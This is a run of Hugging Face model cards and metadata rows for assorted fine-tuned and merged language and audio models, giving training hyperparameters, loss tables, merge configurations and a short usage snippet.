- generated_from_trainer
model-index:
- name: pythia70M-finetuned-on-lamini-docs
results: []
inference: false
datasets:
- lamini/lamini_docs
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# pythia70M-finetuned-on-lamini-docs
This model is a fine-tuned version of [EleutherAI/pythia-70m](https://huggingface.co/EleutherAI/pythia-70m) on [lamini/lamini_docs](https://huggingface.co/datasets/lamini/lamini_docs) dataset.
It achieves the following results on the evaluation set:
- Loss: 2.0582
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-05
- train_batch_size: 1
- eval_batch_size: 1
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 4
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 1
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| 3.3194 | 0.16 | 50 | 2.4776 |
| 2.3198 | 0.32 | 100 | 2.3780 |
| 2.16 | 0.48 | 150 | 2.2905 |
| 2.2156 | 0.63 | 200 | 2.2450 |
| 2.3342 | 0.79 | 250 | 2.1934 |
| 2.7634 | 0.95 | 300 | 2.1748 |
| 2.4963 | 1.11 | 350 | 2.1500 |
| 2.1493 | 1.27 | 400 | 2.1413 |
| 1.8731 | 1.43 | 450 | 2.1200 |
| 2.0132 | 1.59 | 500 | 2.1030 |
| 1.9606 | 1.75 | 550 | 2.0848 |
| 1.37 | 1.9 | 600 | 2.0659 |
| 1.7681 | 2.06 | 650 | 2.0744 |
| 1.8926 | 2.22 | 700 | 2.0779 |
| 1.2409 | 2.38 | 750 | 2.0683 |
| 1.489 | 2.54 | 800 | 2.0616 |
| 1.5143 | 2.7 | 850 | 2.0604 |
| 1.3736 | 2.86 | 900 | 2.0582 |
### Framework versions
- Transformers 4.34.1
- Pytorch 2.0.1+cu118
- Datasets 2.14.5
- Tokenizers 0.14.1 |
urisoo/gptneo-125m-adalora | urisoo | 2024-01-22T07:06:13Z | 5 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:EleutherAI/gpt-neo-125m",
"base_model:adapter:EleutherAI/gpt-neo-125m",
"region:us"
] | null | 2024-01-22T07:06:11Z | ---
library_name: peft
base_model: EleutherAI/gpt-neo-125m
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.7.2.dev0 |
fasterinnerlooper/llama-7b-qlora-csharp | fasterinnerlooper | 2024-01-22T06:57:05Z | 18 | 0 | peft | [
"peft",
"safetensors",
"generated_from_trainer",
"base_model:stabilityai/stable-code-3b",
"base_model:adapter:stabilityai/stable-code-3b",
"license:other",
"region:us"
] | null | 2024-01-15T17:38:28Z | ---
license: other
library_name: peft
tags:
- generated_from_trainer
base_model: stabilityai/stable-code-3b
model-index:
- name: llama-7b-qlora-csharp
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# llama-7b-qlora-csharp
This model is a fine-tuned version of [stabilityai/stable-code-3b](https://huggingface.co/stabilityai/stable-code-3b) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 1
- eval_batch_size: 1
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 4
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.3
- training_steps: 50
### Framework versions
- PEFT 0.7.1
- Transformers 4.36.2
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0 |
Jaemink/lg_application | Jaemink | 2024-01-22T06:56:29Z | 3 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:davidkim205/komt-Llama-2-13b-hf",
"base_model:adapter:davidkim205/komt-Llama-2-13b-hf",
"region:us"
] | null | 2024-01-22T06:56:09Z | ---
library_name: peft
base_model: davidkim205/komt-Llama-2-13b-hf
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.7.2.dev0 |
ssong1/gpt-j-5.8b-sum-adapter | ssong1 | 2024-01-22T06:50:25Z | 6 | 0 | peft | [
"peft",
"safetensors",
"en",
"kr",
"dataset:open-Orca/OpenOrca",
"license:apache-2.0",
"region:us"
] | null | 2024-01-16T08:37:58Z | ---
license: apache-2.0
library_name: peft
base_model: ssong1/kgpt-j-5.8b
datasets:
- open-Orca/OpenOrca
language:
- en
- kr
---
#### This Model
This model is a finetuned version of [EleutherAI/polyglot-ko-5.8b] (https://huggingface.co/EleutherAI/polyglot-ko-5.8b).
It was aligned with [🤗 TRL's](https://github.com/huggingface/trl) `SFTTrainer` on the [Open-Orca/OpenOrca](https://huggingface.co/datasets/Open-Orca/OpenOrca) dataset.
#### How to use
```python
import json
import torch
from peft import LoraConfig, get_peft_model
from transformers import AutoTokenizer, AutoModelForCausalLM, BitsAndBytesConfig
from peft import PeftModel
model1 = AutoModelForCausalLM.from_pretrained(
"ssong1/gpt-j-5.8b", torch_dtype="auto", device_map="auto"
)
lora_path = "ssong1/gpt-j-5.8b-sum-adapter"
model2 = PeftModel.from_pretrained(model1, lora_path, device_map="auto")
tokenizer = AutoTokenizer.from_pretrained(lora_path)
prompt_template = """\
{system_prompt}<|im_end|>
<|im_start|>user
{prompt}<|im_end|>
<|im_start|>assistant"""
msg = "Q:다음 문서를 요약 하세요, Context:{context}"
system_prompt = "You are an AI assistant. User will you give you a task. Your goal is to complete the task as faithfully as you can."
context="""\
"""
tokens = tokenizer.encode(
prompt_template.format(
system_prompt=system_prompt,
prompt=msg.format(context=context),
),
return_tensors="pt",
).to(device="auto", non_blocking=True)
gen_tokens = model2.generate(
input_ids=tokens,
do_sample=False,
temperature=0.5,
max_length=1024,
pad_token_id=63999,
eos_token_id=63999,
)
inputs = tokenizer.batch_decode([gen_tokens[0][: tokens[0].shape[0]]])[0]
generated = tokenizer.batch_decode([gen_tokens[0][tokens[0].shape[0] :]])[0].replace(
"<|im_end|>", ""
)
print(inputs)
print("\ngenerated:")
print(generated)
```
### Framework versions
- PEFT 0.7.1 |
DooDooHyun/AIFT-42dot_LLM-PLM-1.3B-ao-instruct-all-v0.55 | DooDooHyun | 2024-01-22T06:46:41Z | 60 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"generated_from_trainer",
"base_model:42dot/42dot_LLM-PLM-1.3B",
"base_model:finetune:42dot/42dot_LLM-PLM-1.3B",
"license:cc-by-nc-4.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-22T06:27:06Z | ---
license: cc-by-nc-4.0
base_model: 42dot/42dot_LLM-PLM-1.3B
tags:
- generated_from_trainer
model-index:
- name: AIFT-42dot_LLM-PLM-1.3B-ao-instruct-all-v0.55
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# AIFT-42dot_LLM-PLM-1.3B-ao-instruct-all-v0.55
This model is a fine-tuned version of [42dot/42dot_LLM-PLM-1.3B](https://huggingface.co/42dot/42dot_LLM-PLM-1.3B) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 24
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 96
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 1.0
- mixed_precision_training: Native AMP
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.2+cu121
- Datasets 2.0.0
- Tokenizers 0.15.0
|
jeiku/Rosa_v1_3B | jeiku | 2024-01-22T06:44:59Z | 42 | 3 | transformers | [
"transformers",
"safetensors",
"stablelm_epoch",
"text-generation",
"conversational",
"custom_code",
"en",
"license:other",
"autotrain_compatible",
"region:us"
] | text-generation | 2023-12-25T20:10:09Z | ---
language:
- en
license: other
---
First and foremost, I would like to thank https://huggingface.co/Aryanne for pointing me in the right direction. This model started as a remix of https://huggingface.co/Aryanne/Astrea-RP-v1-3B. A healthy helping of https://huggingface.co/jondurbin/airoboros-3b-3p0 was added. The entire thing was then mixed back over itself with several methods before a touch of https://huggingface.co/pansophic/rocket-3B and https://huggingface.co/stabilityai/stablelm-zephyr-3b were added. The model was then mixed with an older version of itself twice to water down the influence of the DPO models.
In the end I was left with a seemingly coherent and interesting AI companion model. I intend to test this model further to see if anything else can be done to improve it.
Named after my faithful companion Rosa. This model will be her foundation on my mobile device.
GGUF version here: https://huggingface.co/jeiku/Rosa_v1_3B_GGUF |
OmBenz/finetuned-gtzan | OmBenz | 2024-01-22T06:43:55Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"hubert",
"audio-classification",
"generated_from_trainer",
"dataset:marsyas/gtzan",
"base_model:facebook/hubert-base-ls960",
"base_model:finetune:facebook/hubert-base-ls960",
"license:apache-2.0",
"model-index",
"endpoints_compatible",
"region:us"
] | audio-classification | 2024-01-22T06:37:54Z | ---
license: apache-2.0
base_model: facebook/hubert-base-ls960
tags:
- generated_from_trainer
datasets:
- marsyas/gtzan
metrics:
- accuracy
model-index:
- name: hubert-base-ls960-finetuned-gtzan
results:
- task:
name: Audio Classification
type: audio-classification
dataset:
name: GTZAN
type: marsyas/gtzan
config: all
split: train
args: all
metrics:
- name: Accuracy
type: accuracy
value: 0.88
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# hubert-base-ls960-finetuned-gtzan
This model is a fine-tuned version of [facebook/hubert-base-ls960](https://huggingface.co/facebook/hubert-base-ls960) on the GTZAN dataset.
It achieves the following results on the evaluation set:
- Loss: 0.7650
- Accuracy: 0.88
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 15
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 2.2258 | 1.0 | 225 | 1.9240 | 0.28 |
| 1.6083 | 2.0 | 450 | 1.4887 | 0.39 |
| 1.3983 | 3.0 | 675 | 1.3524 | 0.56 |
| 0.7368 | 4.0 | 900 | 1.3110 | 0.56 |
| 0.6121 | 5.0 | 1125 | 0.9572 | 0.72 |
| 0.1772 | 6.0 | 1350 | 0.8775 | 0.73 |
| 1.8666 | 7.0 | 1575 | 0.6078 | 0.82 |
| 0.091 | 8.0 | 1800 | 0.9999 | 0.76 |
| 0.0458 | 9.0 | 2025 | 0.7169 | 0.83 |
| 0.6817 | 10.0 | 2250 | 0.7614 | 0.86 |
| 0.7023 | 11.0 | 2475 | 0.9348 | 0.84 |
| 0.0047 | 12.0 | 2700 | 0.7222 | 0.88 |
| 0.0363 | 13.0 | 2925 | 0.7027 | 0.89 |
| 0.0073 | 14.0 | 3150 | 0.7440 | 0.88 |
| 0.0055 | 15.0 | 3375 | 0.7650 | 0.88 |
### Framework versions
- Transformers 4.38.0.dev0
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
SuccubusBot/NoroFighter-13B-v0.1a-AWQ | SuccubusBot | 2024-01-22T06:40:29Z | 6 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"merge",
"mergekit",
"lazymergekit",
"KoboldAI/LLaMA2-13B-Psyfighter2",
"NeverSleep/Noromaid-13b-v0.2",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"awq",
"region:us"
] | text-generation | 2024-01-22T06:37:32Z | ---
license: apache-2.0
tags:
- merge
- mergekit
- lazymergekit
- KoboldAI/LLaMA2-13B-Psyfighter2
- NeverSleep/Noromaid-13b-v0.2
---
# NoroFighter-13B-v0.1a
Our very first attempt at merging models!
`NoroFighter-13B-v0.1a` is a merge of the following models using [mergekit](https://github.com/cg123/mergekit):
* [KoboldAI/LLaMA2-13B-Psyfighter2](https://huggingface.co/KoboldAI/LLaMA2-13B-Psyfighter2)
* [NeverSleep/Noromaid-13b-v0.2](https://huggingface.co/NeverSleep/Noromaid-13b-v0.2)
## 🧩 Configuration
```yaml
merge_method: dare_ties
dtype: float16
base_model: TheBloke/Llama-2-13B-fp16
models:
- model: TheBloke/Llama-2-13B-fp16
- model: KoboldAI/LLaMA2-13B-Psyfighter2
parameters:
weight: 0.3
density: 0.53
- model: NeverSleep/Noromaid-13b-v0.2
parameters:
weight: 0.7
density: 0.53
``` |
CLMBR/binding-reconstruction-transformer-3 | CLMBR | 2024-01-22T06:39:23Z | 12 | 0 | transformers | [
"transformers",
"pytorch",
"opt",
"text-generation",
"generated_from_trainer",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-17T22:51:11Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-reconstruction-transformer-3
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-reconstruction-transformer-3
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.8568
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 3
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.2251 | 0.03 | 76320 | 4.1961 |
| 4.0217 | 1.03 | 152640 | 4.0263 |
| 3.9113 | 0.03 | 228960 | 3.9512 |
| 3.845 | 1.03 | 305280 | 3.9098 |
| 3.7952 | 0.03 | 381600 | 3.8847 |
| 3.7506 | 1.03 | 457920 | 3.8690 |
| 3.7172 | 0.03 | 534240 | 3.8581 |
| 3.6885 | 1.03 | 610560 | 3.8512 |
| 3.6612 | 0.03 | 686880 | 3.8465 |
| 3.6363 | 0.03 | 763200 | 3.8437 |
| 3.6152 | 1.03 | 839520 | 3.8421 |
| 3.5959 | 0.03 | 915840 | 3.8426 |
| 3.5758 | 1.03 | 992160 | 3.8422 |
| 3.5552 | 0.03 | 1068480 | 3.8419 |
| 3.5382 | 1.03 | 1144800 | 3.8440 |
| 3.5253 | 0.03 | 1221120 | 3.8441 |
| 3.5111 | 1.03 | 1297440 | 3.8450 |
| 3.4998 | 0.03 | 1373760 | 3.8470 |
| 3.4832 | 1.03 | 1450080 | 3.8483 |
| 3.4754 | 0.03 | 1526400 | 3.8490 |
| 3.4668 | 1.03 | 1602720 | 3.8499 |
| 3.4585 | 0.03 | 1679040 | 3.8526 |
| 3.4478 | 1.03 | 1755360 | 3.8536 |
| 3.4399 | 0.03 | 1831680 | 3.8538 |
| 3.4268 | 1.03 | 1908000 | 3.8557 |
| 3.4147 | 0.03 | 1984320 | 3.8563 |
| 3.4035 | 1.03 | 2060640 | 3.8571 |
| 3.3938 | 0.03 | 2136960 | 3.8578 |
| 3.3836 | 1.03 | 2213280 | 3.8590 |
| 3.3694 | 0.03 | 2289600 | 3.8594 |
| 3.3597 | 1.03 | 2365920 | 3.8598 |
| 3.3515 | 0.03 | 2442240 | 3.8609 |
| 3.3398 | 1.03 | 2518560 | 3.8605 |
| 3.332 | 0.03 | 2594880 | 3.8613 |
| 3.3229 | 1.03 | 2671200 | 3.8608 |
| 3.316 | 0.03 | 2747520 | 3.8610 |
| 3.3117 | 1.03 | 2823840 | 3.8607 |
| 3.3036 | 0.03 | 2900160 | 3.8601 |
| 3.2983 | 1.03 | 2976480 | 3.8590 |
| 3.2935 | 0.02 | 3052726 | 3.8568 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
Kquant03/BurningBruce-SOLAR-8x10.7B-bf16 | Kquant03 | 2024-01-22T06:35:51Z | 1,376 | 4 | transformers | [
"transformers",
"safetensors",
"mixtral",
"text-generation",
"merge",
"moe",
"conversational",
"en",
"arxiv:2101.03961",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-20T02:10:32Z | ---
license: apache-2.0
language:
- en
tags:
- merge
- moe
thumbnail: ""
---

# Theoretically unstoppable. (evals prove otherwise)
A Convex frankenMoE. Created via improving the original Seraphim script. The models that were implemented are as follows:
- [kyujinpy/Sakura-SOLAR-Instruct](https://huggingface.co/kyujinpy/Sakura-SOLAR-Instruct) - base
- [PracticeLLM/SOLAR-tail-10.7B-Merge-v1.0](https://huggingface.co/PracticeLLM/SOLAR-tail-10.7B-Merge-v1.0) - expert #1
- [NousResearch/Nous-Hermes-2-SOLAR-10.7B](https://huggingface.co/NousResearch/Nous-Hermes-2-SOLAR-10.7B) - expert #2
- [kyujinpy/Sakura-SOLAR-Instruct](https://huggingface.co/kyujinpy/Sakura-SOLAR-Instruct) - expert #3
- [NousResearch/Nous-Hermes-2-SOLAR-10.7B](https://huggingface.co/NousResearch/Nous-Hermes-2-SOLAR-10.7B) - expert #4
- [upstage/SOLAR-10.7B-Instruct-v1.0](https://huggingface.co/upstage/SOLAR-10.7B-Instruct-v1.0) - expert #5
- [kodonho/SolarM-SakuraSolar-SLERP](https://huggingface.co/kodonho/SolarM-SakuraSolar-SLERP) - expert #6
- [kyujinpy/Sakura-SOLAR-Instruct](https://huggingface.co/kyujinpy/Sakura-SOLAR-Instruct) - expert #7
- [kyujinpy/Sakura-SOLAR-Instruct](https://huggingface.co/kyujinpy/Sakura-SOLAR-Instruct) - expert #8
# "[What is a Mixture of Experts (MoE)?](https://huggingface.co/blog/moe)"
### (from the MistralAI papers...click the quoted question above to navigate to it directly.)
The scale of a model is one of the most important axes for better model quality. Given a fixed computing budget, training a larger model for fewer steps is better than training a smaller model for more steps.
Mixture of Experts enable models to be pretrained with far less compute, which means you can dramatically scale up the model or dataset size with the same compute budget as a dense model. In particular, a MoE model should achieve the same quality as its dense counterpart much faster during pretraining.
So, what exactly is a MoE? In the context of transformer models, a MoE consists of two main elements:
Sparse MoE layers are used instead of dense feed-forward network (FFN) layers. MoE layers have a certain number of “experts” (e.g. 32 in my "frankenMoE"), where each expert is a neural network. In practice, the experts are FFNs, but they can also be more complex networks or even a MoE itself, leading to hierarchical MoEs!
A gate network or router, that determines which tokens are sent to which expert. For example, in the image below, the token “More” is sent to the second expert, and the token "Parameters” is sent to the first network. As we’ll explore later, we can send a token to more than one expert. How to route a token to an expert is one of the big decisions when working with MoEs - the router is composed of learned parameters and is pretrained at the same time as the rest of the network.
At every layer, for every token, a router network chooses two of these groups (the “experts”) to process the token and combine their output additively.

Switch Layer
MoE layer from the [Switch Transformers paper](https://arxiv.org/abs/2101.03961)
So, to recap, in MoEs we replace every FFN layer of the transformer model with an MoE layer, which is composed of a gate network and a certain number of experts.
Although MoEs provide benefits like efficient pretraining and faster inference compared to dense models, they also come with challenges:
Training: MoEs enable significantly more compute-efficient pretraining, but they’ve historically struggled to generalize during fine-tuning, leading to overfitting.
Inference: Although a MoE might have many parameters, only some of them are used during inference. This leads to much faster inference compared to a dense model with the same number of parameters. However, all parameters need to be loaded in RAM, so memory requirements are high. For example, [given a MoE like Mixtral 8x7B](https://huggingface.co/blog/moe), we’ll need to have enough VRAM to hold a dense 47B parameter model. Why 47B parameters and not 8 x 7B = 56B? That’s because in MoE models, only the FFN layers are treated as individual experts, and the rest of the model parameters are shared. At the same time, assuming just two experts are being used per token, the inference speed (FLOPs) is like using a 12B model (as opposed to a 14B model), because it computes 2x7B matrix multiplications, but with some layers shared (more on this soon).
If all our tokens are sent to just a few popular experts, that will make training inefficient. In a normal MoE training, the gating network converges to mostly activate the same few experts. This self-reinforces as favored experts are trained quicker and hence selected more. To mitigate this, an auxiliary loss is added to encourage giving all experts equal importance. This loss ensures that all experts receive a roughly equal number of training examples. The following sections will also explore the concept of expert capacity, which introduces a threshold of how many tokens can be processed by an expert. In transformers, the auxiliary loss is exposed via the aux_loss parameter.
## "Wait...but you called this a frankenMoE?"
The difference between MoE and "frankenMoE" lies in the fact that the router layer in a model like the one on this repo is not trained simultaneously. |
yeye776/OndeviceAI-T5-base-simple | yeye776 | 2024-01-22T06:34:17Z | 4 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:paust/pko-t5-base",
"base_model:finetune:paust/pko-t5-base",
"license:cc-by-4.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-01-22T06:33:38Z | ---
license: cc-by-4.0
base_model: paust/pko-t5-base
tags:
- generated_from_trainer
model-index:
- name: OndeviceAI-T5-base-simple
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# OndeviceAI-T5-base-simple
This model is a fine-tuned version of [paust/pko-t5-base](https://huggingface.co/paust/pko-t5-base) on the None dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0007
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- gradient_accumulation_steps: 8
- total_train_batch_size: 32
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: cosine
- lr_scheduler_warmup_ratio: 0.06
- num_epochs: 10
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
CLMBR/binding-reconstruction-lstm-0 | CLMBR | 2024-01-22T06:33:22Z | 3 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T22:57:40Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-reconstruction-lstm-0
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-reconstruction-lstm-0
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9713
